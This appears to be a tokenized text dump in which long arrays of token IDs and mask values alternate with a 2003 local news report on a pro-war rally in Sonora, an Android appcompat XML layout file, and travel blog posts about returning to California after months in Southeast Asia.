1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Hundreds back president, war HUNDREDS OF PEOPLE gathered for a freedom rally in Courthouse square on Saturday. (Amy Alonzo/Copyright 2003, The Union Democrat). By JASON ECK About 500 people rallied in support of President George W. Bush, U.S. troops and possible war against Iraq on Saturday afternoon in downtown Sonora. A sea of red, white and blue filled the sidewalk as a steady stream of marchers waved American flags, hoisted homemade signs, shouted slogans and sang patriotic songs on the route between Woods Creek Rotary Park near the Mother Lode Fairgrounds and Courthouse Square on North Washington Street. The March for Freedom parade and rally was organized by siblings Todd and Melody Johnson of Twain Harte in response to a peace march held last month. The Johnsons were among the approximately 60 people — mostly veterans and their relatives — who countered about 1,000 demonstrators gathered for the Sonora Peace March in Courthouse Square in February. Todd Johnson told the crowd Saturday he was disappointed by the shortage of American flags he saw among the peace demonstrators, and wanted to show that "though the peace marchers were a very loud group, they are a small percent of the population." Todd Johnson called Saturday's march and rally "inspiring" and said more people turned out than he anticipated. The crowd carried signs that included "Support our troops, America has freedom, not the U.N.," "911 was not our choice," and "Saddam comply or say goodbye." A handful of speakers rallied the crowd that gathered at the park. Gus and Cheryl Allegri of Sonora, dressed in matching shirts with the words "United We Stand," said they were marching because they back the Bush Administration. They said they also wanted to show support for U.S. troops in the Middle East. "People need to know that liberty comes with a price," Gus Allegri said. "I think we need to stamp evil out of the world, and Saddam certainly is an evil, evil man," Cheryl Allegri said.
[ 1, 379, 6453, 29879, 1250, 6673, 29892, 1370, 13, 13, 29950, 18783, 1525, 8452, 8079, 349, 29923, 4590, 1307, 22229, 363, 263, 16082, 364, 635, 297, 6325, 386, 1709, 6862, 373, 24211, 29889, 313, 29909, 1357, 838, 265, 2502, 29914, 11882, 1266, 29871, 29906, 29900, 29900, 29941, 29892, 450, 7761, 4432, 16909, 467, 13, 13, 2059, 435, 29909, 3094, 382, 7077, 13, 13, 28173, 29871, 29945, 29900, 29900, 2305, 364, 284, 2957, 297, 2304, 310, 7178, 5122, 399, 29889, 24715, 29892, 501, 29889, 29903, 29889, 13230, 322, 1950, 1370, 2750, 21375, 29939, 373, 24211, 17724, 297, 16611, 593, 776, 5791, 2207, 29889, 13, 13, 29909, 7205, 310, 2654, 29892, 4796, 322, 7254, 10423, 278, 2625, 20919, 408, 263, 27357, 4840, 310, 8575, 414, 281, 10511, 3082, 13449, 29892, 5089, 12652, 3632, 331, 1943, 18906, 29892, 21272, 287, 269, 1188, 550, 322, 13625, 16967, 13574, 12516, 373, 278, 5782, 1546, 10180, 29879, 15594, 9664, 653, 4815, 2978, 278, 21869, 365, 356, 13822, 2057, 29879, 322, 6325, 386, 1709, 19256, 373, 4644, 7660, 7103, 29889, 13, 13, 1576, 4779, 363, 3878, 11607, 1702, 311, 322, 364, 635, 471, 19098, 491, 27767, 18964, 7561, 29881, 322, 6286, 1486, 11717, 310, 8168, 475, 3536, 371, 297, 2933, 304, 263, 10776, 8575, 4934, 1833, 4098, 29889, 13, 13, 1576, 1861, 1983, 787, 892, 4249, 278, 14235, 29871, 29953, 29900, 2305, 29871, 30527, 11149, 25808, 550, 322, 1009, 14576, 29871, 30527, 1058, 6795, 287, 1048, 29871, 29896, 29892, 29900, 29900, 29900, 9004, 4097, 22229, 363, 278, 5791, 2207, 24819, 4779, 297, 6325, 386, 1709, 19256, 297, 6339, 29889, 13, 13, 29911, 22861, 11717, 5429, 278, 19174, 24211, 540, 471, 23451, 287, 491, 278, 3273, 482, 310, 3082, 13449, 540, 4446, 4249, 278, 10776, 9004, 4097, 29892, 322, 5131, 304, 1510, 393, 376, 3592, 278, 10776, 8575, 414, 892, 263, 1407, 22526, 2318, 29892, 896, 526, 263, 2319, 10151, 310, 278, 4665, 1213, 13, 13, 29911, 22861, 11717, 2000, 24211, 29915, 29879, 8575, 322, 364, 635, 376, 262, 1028, 8491, 29908, 322, 1497, 901, 2305, 6077, 714, 1135, 540, 23483, 630, 29889, 13, 13, 1576, 19174, 8988, 18906, 393, 5134, 376, 14039, 1749, 13230, 29892, 6813, 756, 16082, 29892, 451, 278, 501, 29889, 29940, 1696, 29908, 376, 29929, 29896, 29896, 471, 451, 1749, 7348, 1699, 322, 376, 29903, 1202, 314, 752, 368, 470, 1827, 1781, 26966, 1213, 13, 13, 29909, 1361, 1319, 310, 7726, 414, 364, 284, 2957, 278, 19174, 393, 22229, 472, 278, 14089, 29889, 13, 13, 29954, 375, 322, 678, 708, 29880, 838, 1397, 374, 310, 5791, 2207, 29892, 27121, 297, 9686, 528, 381, 1372, 411, 278, 3838, 376, 2525, 1573, 1334, 6679, 1699, 1497, 896, 892, 8575, 292, 1363, 896, 1250, 278, 24715, 23303, 29889, 2688, 1497, 896, 884, 5131, 304, 1510, 2304, 363, 501, 29889, 29903, 29889, 13230, 297, 278, 14253, 6932, 29889, 13, 13, 29908, 15666, 1991, 817, 304, 1073, 393, 24169, 5304, 411, 263, 8666, 1699, 402, 375, 838, 1397, 374, 1497, 29889, 13, 13, 29908, 29902, 1348, 591, 817, 304, 25214, 16126, 714, 310, 278, 3186, 29892, 322, 317, 1202, 314, 8959, 338, 385, 16126, 29892, 16126, 767, 1699, 678, 708, 29880, 838, 1397, 374, 1497, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
<?xml version="1.0" encoding="utf-8"?> <!-- Copyright (C) 2013 The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <android.support.v7.internal.view.menu.ExpandedMenuView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/expanded_menu" android:layout_width="?attr/panelMenuListWidth" android:layout_height="wrap_content" /> <!-- From: file:/usr/local/google/buildbot/repo_clients/https___googleplex-android.googlesource.com_a_platform_manifest.git/mnc-supportlib-release/frameworks/support/v7/appcompat/res/layout/abc_expanded_menu_layout.xml -->
[ 1, 6319, 3134, 1873, 543, 29896, 29889, 29900, 29908, 8025, 543, 9420, 29899, 29947, 18943, 13, 14136, 14187, 1266, 313, 29907, 29897, 29871, 29906, 29900, 29896, 29941, 450, 5669, 4673, 7562, 8010, 13, 13, 268, 10413, 21144, 1090, 278, 13380, 19245, 29892, 10079, 29871, 29906, 29889, 29900, 313, 1552, 376, 29931, 293, 1947, 1496, 13, 268, 366, 1122, 451, 671, 445, 934, 5174, 297, 752, 13036, 411, 278, 19245, 29889, 13, 268, 887, 1122, 4017, 263, 3509, 310, 278, 19245, 472, 13, 13, 3986, 1732, 597, 1636, 29889, 4288, 29889, 990, 29914, 506, 11259, 29914, 27888, 1430, 1660, 29899, 29906, 29889, 29900, 13, 13, 268, 25870, 3734, 491, 22903, 4307, 470, 15502, 304, 297, 5007, 29892, 7047, 13, 268, 13235, 1090, 278, 19245, 338, 13235, 373, 385, 376, 3289, 8519, 29908, 350, 3289, 3235, 29892, 13, 268, 399, 1806, 8187, 2692, 399, 1718, 29934, 13566, 29059, 6323, 8707, 29928, 22122, 29903, 8079, 13764, 29979, 476, 22255, 29892, 2845, 4653, 470, 2411, 2957, 29889, 13, 268, 2823, 278, 19245, 363, 278, 2702, 4086, 14765, 1076, 11239, 322, 13, 268, 27028, 1090, 278, 19245, 29889, 13, 15110, 13, 13, 29966, 2843, 29889, 5924, 29889, 29894, 29955, 29889, 7564, 29889, 1493, 29889, 6510, 29889, 29777, 287, 6823, 1043, 13, 4706, 9463, 29901, 2843, 543, 1124, 597, 11993, 29889, 2843, 29889, 510, 29914, 16681, 29914, 690, 29914, 2843, 29908, 13, 4706, 1442, 29901, 333, 9438, 333, 29914, 18837, 287, 29918, 6510, 29908, 13, 4706, 1442, 29901, 2680, 29918, 2103, 543, 29973, 5552, 29914, 15119, 6823, 1293, 6110, 29908, 13, 4706, 1442, 29901, 2680, 29918, 3545, 543, 6312, 29918, 3051, 29908, 2900, 13, 14136, 3645, 29901, 934, 8419, 4855, 29914, 2997, 29914, 3608, 29914, 4282, 7451, 29914, 20095, 29918, 11303, 1237, 29914, 991, 22359, 3608, 10709, 29899, 2843, 29889, 1484, 468, 793, 1167, 29889, 510, 29918, 29874, 29918, 12120, 29918, 29135, 29889, 5559, 29914, 29885, 17608, 29899, 5924, 1982, 29899, 14096, 29914, 4468, 29879, 29914, 5924, 29914, 29894, 29955, 29914, 932, 12667, 29914, 690, 29914, 2680, 29914, 10736, 29918, 18837, 287, 29918, 6510, 29918, 2680, 29889, 3134, 6660 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
We shall not cease from exploration And the end of all our exploring Will be to arrive where we started And know the place for the first time — T.S. Eliot, “Little Gidding” I scrawled these words onto the final page of the moleskin I brought traveling, as a reminder to make my travels worth something more than the time and money that I spent abroad. As a reminder to acknowledge the changes within myself and the adjusted lens through which I now see the world. And with these things in mind, the transition back into America has been a breeze. I mean, spending two weeks basically on vacation in Northern California certainly wasn’t a challenge, but even coming home to Baton Rouge. While I usually curse the town where I was raised for all it’s faults, I found myself looking at the advantages to living here and noting all the improvements that have been made to the city since I’ve been away. But I really felt that I had come back to the place where it all began when we touched down in New York. It’s where the idea for this trip was born, and being back felt like the end — but in a good way. In a, man, we really did it, kind of way. I think travel affects everyone differently. And I’m happy to say that the things I’ve noticed about myself that weren’t here before are for the majority, positive improvements. I feel more optimistic, more patient, and more accepting of people just as they are. The trick to making long term travel worthwhile is holding on to these things. Not losing the positive effects of being out in the world in strange places surrounded by strange people and eating strange food, but to embrace those things by letting yourself change on the inside and not let go. But it’s true what Eliot says: We shall not cease from exploration. Everyday can be one of exploration, of satisfying new curiosities. And the way to keep life interesting is to stay curious, even about things just around the corner. When I had the chance to make a four hour stop in Salt Lake City instead of flying direct from Oakland to New Orleans, I took it. Phil picked me up at the airport and we drove around downtown, admiring the very creatively named streets… they’re all numbered radiating from a single point in the middle of the city where the Mormon Temple sits. We both nursed hangovers at Phil’s favorite little place, Park Cafe (delicious!) and then took a ride through Big Cottonwood Canyon where in May, we had a legitimate snowball fight. I returned to the airport just in time for my flight to be delayed four hours, but it was totally worth it. Nate made a similar trip a week later. He ended up taking a free shuttle bus from the airport to the Mormon temple where a group of girls gravitated toward him like magnets and “were really nice, but were trying to get inside me.” Metaphorically speaking of course, asking stuff like “Isn’t the world pretty? Isn’t this such a beautiful and fascinating world? Don’t you wonder where it came from? Some one had to make this right? That’s God.” (Insert dramatic pauses at will.) Phil came to his rescue: a romantic spot for the sunset, some chinese take out, and a few beers at Phil’s place. Not bad for an extended layover. This post is a little different. It won’t be enjoyed in a few minutes at work. For this experience, you must take some deep breaths and clear your mind. The real experience is in the audio clip at the end of this post. This is a little snipit of a random night in New Orleans. There’s a little local bar in the Marigny called MiMi’s, that epitomizes New Orleans. Worn down, grungy, musky, but full of energy as all walks of life come together for a drink. I had a few beers downstairs before climbing the stairs to uncover the muffled sounds above. I found a little ragtag brass and strings ensemble in the corner of the little second floor bar room. There were little tables scattered around the room with candles burning down, and tattooed couples two-steping in and around the band. The lights were dim, the spirits were high, and everyone drank and laughed another Monday night away. I was having lunch today with a friend in Brooklyn, reflecting on the last 9 months of my life. While talking about the lessons, thoughts, ideas, and sensations of travel, I found myself really trying to describe what makes it all worth it. I was sitting across from her, broke, in need of a haircut, with no job, and all the other realities that come from quitting and rejoining society. So I began to describe a theoretical way of gauging this worth which became “naked worth.” Imagine you’re sitting in restaurant and suddenly, POOF! A bright flash, and everything disappears except people. Your table, chair, clothes, bags, and even your food disappears. Looking around, you notice that in fact all that’s left is some dull gray walls. As you look at the other people that were in the restaurant, you’re confused because now you can’t decipher the server, VIP guests, cook, or cleaner. You also can’t remember what you did for a living, any jargon, deadlines, or profession. That information is not important here, because money doesn’t exist here. All that had so easily defined you and everyone else is now gone, and it’s not coming back in this room. Everyone begins to move around for a few awkward moments, and slowly the chatter begins. New sets of people begin forming and chatting about some really interesting stuff. There’s no stress, just talk. Unique conversation begin because now everyone’s worth to each other is what they share. Personalities, insights, ideas, and gestures begin creating new relationships with these random people, because they’re naked of everything money, status or job related and seen for their “naked worth.” I think traveling is a great investment in one’s “naked worth,” because: You become a slightly better person to have on earth. You add a little more humanity in the world. You have a more patience, kindness, and perspective. You have more tales that expand and excite the people around you. It doesn’t translate to being smarter, making more money, or being more interesting. It can easily be all or none of these. It’s more of a humanity fabric within. So long-term travel will certainly increase your “naked worth,” and when you’re standing naked amongst the other people, you will be different. What do you think of when you think of traveling? Excitement? Relaxation? Comfort? I used to, but long term traveling is a different story. Down time. Sitting around. Hurry up and wait. And most of all, transportation. Buses, boats, trains, planes, you name it. Our time in Asia added up to 222 days, or 5,328 hours. Of this, 627 hours were spent traveling. That’s about 26 days, and 12% of our total travel time. We used whatever transportation was available to us. In Vietnam we traveled mostly by bus — in fact, overall we traveled mostly by bus: 237 hours total. Cambodia was a combo of bus, boat (across the Tonle Sap) and tuk-tuk. Although they go by different names — tuk-tuks, tricycles, auto rickshaws — they’re all motorbikes with some sort of extra seating, like a cart, attached to the back or the side. In Laos, Thailand and Malaysia, by bus. Philippines by bus and tricycle. And of course, we spent a lot of time on different kinds of boats — both island hopping and diving. The boats ranged from speedboats to bamboo bankas, large wooden Chinese junk boats to freighter ships used as ferries. Travel by car was few and far between. Then there are planes. What isn’t represented here is the amount of time lost checking in at an airport, going through security, sitting around waiting for boarding. Flying was probably my least favorite way to travel. By then end of the trip, a 16-hour bus ride no longer seemed daunting, flying almost seemed like cheating, and we no longer needed anti-motion-sickness pills on boats. Traveling with multiple connections and complicated routes sharpened our senses and increased our ability to act quickly and observe our surroundings closely. Sitting for hours on buses gave us time to reflect on the past and to think about the future. It’s this down time, the time spent quietly and stationary that I felt I got to know myself in a new way, without the distractions of everyday life. It’s when I had the chance to ask myself hard questions and have time to search for the answers inside. While the active, exciting moments of a long trip may form your clearest memories, it’s the quiet moments of reflection that really shape the new person you may feel like when you arrive home. There is no doubt about it: Oakland is awesome. I’ve heard people call it the Brooklyn of the Bay Area (which I disagree with mainly because the Bart stops running at midnight and a taxi costs way more than a Lower Manhattan –> Brooklyn ride). Nevertheless, it’s just over the bridge from SF. It has great restaurants, nightlife, and its very own beautiful lake — great for a 3.5-mile jog or an afternoon picnic. And while we were there, we had the privilege of attending the Oakland Art Murmur. That Friday night we wandered through the streets of downtown Oakland weaving among hipsters young and old, (really cute) kids, and some perfectly average looking people. In my opinion, a great mix. All sorts of multi-wheeled transportation crawled through the crowds — I’m talking about really big bike type things with 4′ wheels that seat up to four people. The proud owner of snail-shaped iron contraption invited kids to hop in and pull a “reign” that blew fire from the snail’s antennae. Most of the art was all right, but there were some cool crafts, like miniature origami earrings and a guy with a 1920s manually operated sewing machine that would custom stitch names and shapes onto swatches of canvas for a dollar. After a couple hours imbibing on a local gallery/bar patio, we headed a few blocks away from the crowds to Creative Growth. Creative Growth Art Center serves adult artists with developmental, mental and physical disabilities, providing a stimulating environment for artistic instruction, gallery promotion and personal expression. Artwork fostered in this unique environment is included in prominent collections and museums worldwide. And while I realize I’ve been out of the country, not in the epicenter of art culture like I was in NY, I still think that the art on display was the best I’ve seen in recent memory. The walls are covered in art — all for sale, but much of it already sold. I loved the paintings of jellyfish and birds, owls and cats. There were pedestals adorned with paper-mache masks and an entire warehouse full of ceramics. The place was inspiring and I’m sure the photos don’t do it justice. Next stop was a place called the Fort Gallery. The neighborhood was a little questionable, and ironically I think it’s really close to our new place. There was a sort of make shift bar in the place selling two things: “Health juice” and absinthe. Evidentally “health juice” was a concoction distributed in very small quantities (less than half a solo cup), made of ginger paste, absinthe (minus the wormwood) and ginger ale. We had a great time watching music in this unique space, but the next day, after ONE of these absurdly named drinks, I felt like I got hit by a bus and struggled to maintain casual conversation. All in all, fantastic night in Oakland. I think this experience sold me on kicking off our Bay Area residency in this sweet little city. When moving to a new city, I think it’s important to do a round of touristy stuff to get to know the city from that point of view that you may never have again. While we stayed with Leah in April and May, we made sure to do just that. – Clam chowder at Fisherman’s Wharf, check. – Pier 39 to see the sea lions, check. – Night tour to Alcatraz, not checked off just yet. We talked about it a lot and we sat on the bay and looked at the little island. Who ever comes to visit us first, you’re in for a treat – Musee Mechanique, check. This place is awesome. Just a warehouse full of vintage coin slot games. – Street car ridin’, check. I have a feeling I’ll do these things many times before it’s all over — and there were a few other little outings better fit for residents. Like enjoying Saturday afternoon in Delores Park or a day trip out to Marin County for a hike. Like accidentally strolling through the Tenderloin or checking out a new bike shop and taking a prototype for a spin on the Embarcadaro and around the Giants’ stadium. Looking back at these photos makes me really excited about our big move to San Francisco in just under two weeks — so friends and fam start planning your visits! Hop in the car with some of your favorite people. Roll the windows down. Turn up the music. Stop when you have to pee. Stop when you’re hungry. Stop when you see people kite surfing and you want to have a closer look. It’s a real road trip — something completely different from what we, as backpackers in Southeast Asia, had been experiencing abroad. Now, I’m a big fan of public transportation. I love trains. I’ve grown to appreciate buses. Subways, trams, trolleys, sign me up. But after over seven months of depending on bus companies to get me from point A to point B, it’s a relief to go on a proper road trip. And last week when we drove down to Santa Cruz, a bus just would not have cut it. Every turn down highway 1 unveils another breath-taking view and the control of being in the driver’s seat allows you to stop and appreciate these views instead of honing your drive-by photography skills. As we traveled up and down the coast, we got up close and personal with a beach full of kite surfers and a lone sunning sea lion; went thrift store shopping, which lead to Leah purchasing a pair of rollerblades for $1.30 and proceeding to cruise around for a few minutes before heading to the beach; and stopped at a roadside diner for hot chocolate to sip as we watched the sunset over the ocean. As I wrote this post, I tried to tie this trip to how influential the mode of transportation is on personal experience while traveling (which is it). But in the end, this post is just in homage of the road trip – the quintessential American travel experience — and the memorable day with friends that Leah’s little Dodge Neon helped shape as we cruised down the coast of Northern California. Decent wine and real cheese are hard to find in Southeast Asia. And while we wouldn’t call ourselves connoisseurs, we missed both dearly while abroad and thought it necessary to spend a few days catching up with our old friends. What better way to reacquaint ourselves than a day trip from San Francisco up to Sonoma County? A drive through Dry Creek Valley, north of Sonoma, got us off the beaten wine-tasting path and into some small, family run vineyards with $5 tasting fees. Lush fields dotted with grazing cows, a mountainous skyline, rolling hills covered in rows of grapes, and the sky — varying between cloudy with light showers, to brilliant sun beams poking through cotton balls — served up a feast for the eyes. There are over a dozen vineyards in the area; we visited five, and our decision making process was pretty random, Was it one turn away? Did we like the name? Was it open? The only real requirement was no tasting fee over $5. The area specializes in Zinfandels — we tasted a lot of spicy wines. Of the vineyards, my personal favorite was Bella, where the tasting was inside a cave, the walls lined with contemporary barrels. The only bottle we purchased was a Savingnon Blanc from Quivira, where our host described tastes in terms of the optimal food pairings. The Food & Wine section of their site does something similar, handy for those of us who are looking to extend our wine knowledge. We checked out the friendly farm atmosphere at Preston Wines, where Leah’s roommate suggested we have lunch in their outdoor area, complete with sheep and picnic tables — but the tasting was $10 and the weather less than optimal for doing anything outside. Our final stop was Zichichi Family Vineyard where the wine selection was limited, but we did a barrel tasting. Gotta love the wine thief. At our very first stop of the day, Wilson Winery, our hostess told us about a lookout point, where after a long day of tasting we went for a bird’s eye view of the valley. On our way back to San Francisco, we wound our way up and over forested hills and through small, charming California towns, to get to Highway 1. We definitely took the long way around thanks to the lady in the GPS, and our friend Phil wrote an interesting post inspired by this experience (travel with versus without digital navigation). Either way though, we reached the stunning Hwy 1 and stopped to hike down to the beach and watch the strength of the Pacific pound the dark sand. The rest of the drive put some of the most beautiful views in America on display as we hugged the coast back down to San Fran, eventually entering the city via the Golden Gate Bridge. We’re back in the states and experiencing less culture shock than anticipated. We arrived in San Francisco where we’ll spend a few weeks with the lovely Leah Wolfe (Nate’s sister, my good friend, and our match maker) who’s big smile and palpable energy greeted us at the airport. To our surprise, as we exited the terminal, a hula-hooping trombone player, a dancer with a horn and a cowgirl waving a map of the world as a flag, began dancing and playing, I don’t even know what, something American. We stood in amazement as they finished their performance, yelled “Welcome to America!!” and walked away. Wow. “You’ve never seen everything,” noted the security guard as we met the red-white-and-blue-clad crew and thanked them for their spirit. A big thanks to Leah, who’s vast spectrum of friends includes girls attending circus school who will travel out to the airport to put on the smallest of shows. Talk about the most amazing welcome home ever. Before leaving SFO, we picked up our friend Phil, who flew in from Salt Lake City — the four of us will be camping and exploring various places down Highway 1 this week. Before we settle down and get jobs Nate and I will be doing a bit of adventuring in the states, so stay tuned to the blog for a bit of Americana travel writing and photos.
[ 1, 1334, 4091, 451, 2257, 559, 515, 3902, 12418, 13, 2855, 278, 1095, 310, 599, 1749, 3902, 8253, 13, 12984, 367, 304, 18331, 988, 591, 4687, 13, 2855, 1073, 278, 2058, 363, 278, 937, 931, 13, 30003, 323, 29889, 29903, 29889, 26864, 327, 29892, 1346, 29931, 1992, 402, 2205, 292, 30024, 13, 13, 29902, 885, 1610, 839, 1438, 3838, 11480, 278, 2186, 1813, 310, 278, 6062, 8488, 262, 306, 6296, 9850, 292, 29892, 408, 263, 1083, 4995, 304, 1207, 590, 9850, 29879, 7088, 1554, 901, 1135, 278, 931, 322, 6909, 393, 306, 10398, 28177, 29889, 1094, 263, 1083, 4995, 304, 18145, 5485, 278, 3620, 2629, 6142, 322, 278, 10365, 287, 301, 575, 1549, 607, 306, 1286, 1074, 278, 3186, 29889, 1126, 411, 1438, 2712, 297, 3458, 29892, 278, 9558, 1250, 964, 6813, 756, 1063, 263, 289, 929, 911, 29889, 306, 2099, 29892, 805, 2548, 1023, 11405, 8830, 373, 11757, 362, 297, 14299, 8046, 8959, 9007, 30010, 29873, 263, 18766, 29892, 541, 1584, 6421, 3271, 304, 12579, 265, 15915, 479, 29889, 5806, 306, 5491, 3151, 344, 278, 4726, 988, 306, 471, 10425, 363, 599, 372, 30010, 29879, 12570, 29879, 29892, 306, 1476, 6142, 3063, 472, 278, 25486, 304, 8471, 1244, 322, 451, 292, 599, 278, 28473, 393, 505, 1063, 1754, 304, 278, 4272, 1951, 306, 30010, 345, 1063, 3448, 29889, 1205, 306, 2289, 7091, 393, 306, 750, 2041, 1250, 304, 278, 2058, 988, 372, 599, 4689, 746, 591, 23051, 1623, 297, 1570, 3088, 29889, 739, 30010, 29879, 988, 278, 2969, 363, 445, 17487, 471, 6345, 29892, 322, 1641, 1250, 7091, 763, 278, 1095, 813, 541, 297, 263, 1781, 982, 29889, 512, 263, 29892, 767, 29892, 591, 2289, 1258, 372, 29892, 2924, 310, 982, 29889, 13, 13, 29902, 1348, 9850, 6602, 29879, 14332, 17587, 29889, 1126, 306, 30010, 